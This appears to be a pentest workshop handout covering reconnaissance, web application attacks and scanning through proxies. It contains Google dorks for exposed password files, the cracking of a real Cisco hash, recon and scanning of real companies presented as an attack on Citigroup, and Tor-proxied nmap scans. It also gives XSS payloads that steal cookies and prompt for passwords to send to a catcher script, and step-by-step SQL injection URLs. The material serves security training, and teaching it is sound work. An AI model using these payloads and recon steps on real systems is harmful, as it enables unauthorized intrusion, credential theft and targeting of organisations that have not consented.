##################################################

# Advanced Pentesting High Security Environments # 

# By Joe McCray                                  #

##################################################

- A 30-day trial of Workstation 11 can be downloaded from here:

- https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0

- A 30-day trial of Fusion 7 can be downloaded from here:

- https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0

- The newest version of VMWare Player can be downloaded from here:

- https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0

https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip

# Download the victim VMs #

https://s3.amazonaws.com/StrategicSec-VMs/Windows7.zip

user: workshop

pass: password

https://s3.amazonaws.com/StrategicSec-VMs/windows8VM.zip

user: StrategicSec

###################################

# Let's start some Google Hacking #

###################################

Open Firefox or Chrome and type the following into Google:

inurl:service.pwd filetype:pwd

filetype:cfg intext:"enable password" cisco

	Found this site: http://www.opus1.com/nac/lv06configs/nap_lkdwncisco3550.cfg

	Then we searched for 'cisco password 7 cracker online' and found this site:

	http://www.ibeast.com/content/tools/ciscopassword/

	We pasted in this hash '06080E22424F0A4953'

We then searched for 'GHDB' and found this site:

Then we learned the 'site:' Google search operator. You can use like this to target your GHDB query:

site:secureninja.com inurl:service.pwd filetype:pwd

We decided to attack CitiGroup

We started by looking for Citigroup in Wikipedia.

https://en.wikipedia.org/wiki/Citigroup

We figured out that they are public, not private. We also wanted to know key people, and subsidiaries (for potential social engineering).

Next we went to https://www.robtex.com/ and searched for CitiGroup.com - we came up with https://www.robtex.com/en/advisory/dns/com/citigroup/

The next website that we went to was:

http://toolbar.netcraft.com/site_report/

http://toolbar.netcraft.com/site_report/?url=citigroup.com

We found out that they are using a Citrix Netscaler Load Balancer.

192.193.103.222 	Citrix Netscaler

192.193.219.58 	

site:citigroup.com filetype:pcf

site:citigroup.com filetype:ica

site:citigroup.com filetype:doc

site:citigroup.com filetype:xls

site:citigroup.com filetype:pdf

Then we installed the Firefox Addon called Passive Recon:

https://addons.mozilla.org/en-us/firefox/addon/passiverecon/

Next we looked at an OSINT report:

########################################

# Boot up the StrategicSec Ubuntu host #

########################################

- Log in to your Ubuntu host with the following credentials:

	user: strategicsec

	pass: strategicsec

- I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests.

- You can download Putty from here:

- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

- For the purpose of this workshop my Win7 VM IP address is: 192.168.153.129 so anytime you see that IP you'll know that's my Win7 VM

- 192.168.153.159 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host

###################################################

# Day 1: Identifying External Security Mechanisms #

###################################################

perl blindcrawl.pl -d motorola.com

fierce -dns motorola.com

Zone Transfer fails on most domains, but here is an example of one that works:

dig axfr heartinternet.co.uk  @ns.heartinternet.co.uk

sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255             Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html

Here are some options to use for identifying load balancers:

        - news.netcraft.com

        - Firefox LiveHTTP Headers

Here are some command-line options to use for identifying load balancers:

./lbd-0.1.sh google.com

halberd microsoft.com

halberd motorola.com

halberd oracle.com

python wafw00f.py http://www.oracle.com

python wafw00f.py http://www.strategicsec.com

sudo nmap -p 80 --script http-waf-detect.nse oracle.com

sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov

#######################################################

# Day 1: 3rd Party Scanning, and scanning via proxies #

#######################################################

https://www.shodan.io

        Create a FREE account and login

        net:129.188.8.0/24

cd /home/strategicsec/toolz/

perl proxyfinder-0.3.pl multiproxy 3 proxies.txt        <-- This takes a long time to run

sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: ocks4  127.0.0.1 9050

----------------------------------------------------------------------

vi ~/toolz/fix-proxychains-dns.sh

# This script is called by proxychains to resolve DNS names

# DNS server used to resolve names

# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html

DNS_SERVER=4.2.2.2

if [ $# = 0 ] ; then

echo " usage:"

echo " proxyresolv <hostname> "

exit

fi

export LD_PRELOAD=libproxychains.so.3

dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'

-----------------------------------------------------------------------

sudo ntpdate pool.ntp.org

tor-resolve strategicsec.com

proxychains nmap -sT -p80 52.11.62.192

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 52.11.62.192

If you want to block tor exit nodes you get a list from here:

http://rules.emergingthreats.net/blockrules/emerging-tor-BLOCK.rules

You probably should also block things like:

http://rules.emergingthreats.net/blockrules/emerging-rbn-BLOCK.rules                    <----- Russian Business Network IPs

http://rules.emergingthreats.net/blockrules/emerging-botcc.rules                        <----- BotNet Command and Control Servers

http://rules.emergingthreats.net/blockrules/emerging-rbn-malvertisers-BLOCK.rules       <----- Malware Advertisers

Here is where you can download the perl script to automatically update your firewall each day (create a cron job for it).

http://doc.emergingthreats.net/bin/view/Main/EmergingFirewallRules

##################################

# Basic: Web Application Testing #

##################################

The basics of web app pentesting

Start with simple firefox addons:

- ShowIP			https://addons.mozilla.org/en-US/firefox/addon/showip/

- Server Spy			https://addons.mozilla.org/en-US/firefox/addon/server-spy/

- FoxyProxy			https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

- Tamper Data			https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

A good list of web app testing add ons for Firefox:

https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/

The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

	1. Does the website talk to a DB?

		- Look for parameter passing (ex: site.com/page.php?id=4)

		- If yes - try SQL Injection

	2. Can I or someone else see what I type?

		- If yes - try XSS

	3. Does the page reference a file?

		- If yes - try LFI/RFI

Let's start with some manual testing against 54.149.82.150 in the lab network. 

Start here:

http://54.149.82.150/

There's no parameter passing on the home page so the answer to question 1 is NO.

There is however a search box in the top right of the webpage, so the answer to question 2 is YES.

Try an XSS in the search box on the home page:

<script>alert(123);</script>

Doing this gives us the following in the address bar:

http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>

Ok, so we've verified that there is XSS in the search box. 

Let's move on to the search box in the left of the page.

Let's give the newsletter signup box a shot

###################################################################

# What is XSS                                                     #

# https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #

###################################################################

OK - what is Cross Site Scripting (XSS)

1. Use Firefox to browse to the following location:

	http://54.186.248.116/xss_practice/

	A really simple search page that is vulnerable should come up. 

2. In the search box type:

	<script>alert('So this is XSS')</script>

	This should pop-up an alert window with your message in it proving XSS is in fact possible.

	Ok, click OK and then click back and go back to http://54.186.248.116/xss_practice/

3. In the search box type:

	<script>alert(document.cookie)</script>

	This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.

	Ok, click OK and then click back and go back to http://54.186.248.116/xss_practice/

4. Now replace that alert script with:

	<script>document.location="http://54.186.248.116/xss_practice/cookie_catcher.php?c="+document.cookie</script> 

This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.

5. Now view the stolen cookie at:

	http://54.186.248.116/xss_practice/cookie_stealer_logs.html

The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.

############################

# A Better Way To Demo XSS #

############################

Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.

Use Firefox to browse to the following location:

	http://54.186.248.116/xss_practice/

Paste this in the search box

----------------------------

Option 1

--------

<script>

password=prompt('Your session is expired. Please enter your password to continue',' '); 

document.write("<img src=\"http://54.186.248.116/xss_practice/passwordgrabber.php?password=" +password+"\">");

</script>

Now view the stolen cookie at:

	http://54.186.248.116/xss_practice/passwords.html

Option 2

--------

<script>

username=prompt('Please enter your username',' ');

password=prompt('Please enter your password',' ');

document.write("<img src=\"http://54.186.248.116/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");

</script>

Now view the stolen cookie at:

http://54.186.248.116/xss_practice/username_password_logs.html

Moving on to the login page.

http://54.149.82.150/login.aspx

I entered a single quote (') for both the user name and the password. I got the following error:

-----------------------------------------------------------------

 'Users//User[@Name=''' and @Password=''']' has an invalid token.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.

Source Error:

Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");

Line 113:            string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";

Line 114:            XmlNodeList xmln = doc.SelectNodes(credential);

Line 115:            //String test = xmln.ToString();            

Line 116:            if (xmln.Count > 0)

-----------------------------------------------------------------

Hmm....System.Xml.XPath.XPathException.....that's not SQL.

WTF is this:

Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");

Let's check it out:

http://54.149.82.150/AuthInfo.xml

Looks like we found passwords!!!!!!!!!!

Looks like there no significant new functionality after logging in with the stolen credentials.

Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links

http://54.149.82.150/bookdetail.aspx?id=2

Ok, there is parameter passing (bookdetail.aspx?id=2).

The page name is:		bookdetail.aspx

The parameter name is:		id

The paramber value is:		2

Let's try throwing a single quote (') in there:

http://54.149.82.150/bookdetail.aspx?id=2'

I get the following error:

Unclosed quotation mark after the character string ''.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.

#############################################################################

# SQL Injection                                                             #

# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #

#############################################################################

- Another quick way to test for SQLI is to remove the paramter value

# Error-Based SQL Injection #

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- 	NOTE: "N" - just means to keep going until you run out of databases

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

# Union-Based SQL Injection #

http://54.149.82.150/bookdetail.aspx?id=2 order by 100--

http://54.149.82.150/bookdetail.aspx?id=2 order by 50--

http://54.149.82.150/bookdetail.aspx?id=2 order by 25--

http://54.149.82.150/bookdetail.aspx?id=2 order by 10--

http://54.149.82.150/bookdetail.aspx?id=2 order by 5--

http://54.149.82.150/bookdetail.aspx?id=2 order by 6--

http://54.149.82.150/bookdetail.aspx?id=2 order by 7--

http://54.149.82.150/bookdetail.aspx?id=2 order by 8--

http://54.149.82.150/bookdetail.aspx?id=2 order by 9--

http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

	We are using a union select statement because we are joining the developer's query with one of our own.

	Reference: 

	http://www.techonthenet.com/sql/union.php

	The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements. 

	It removes duplicate rows between the various SELECT statements.

	Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

	Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--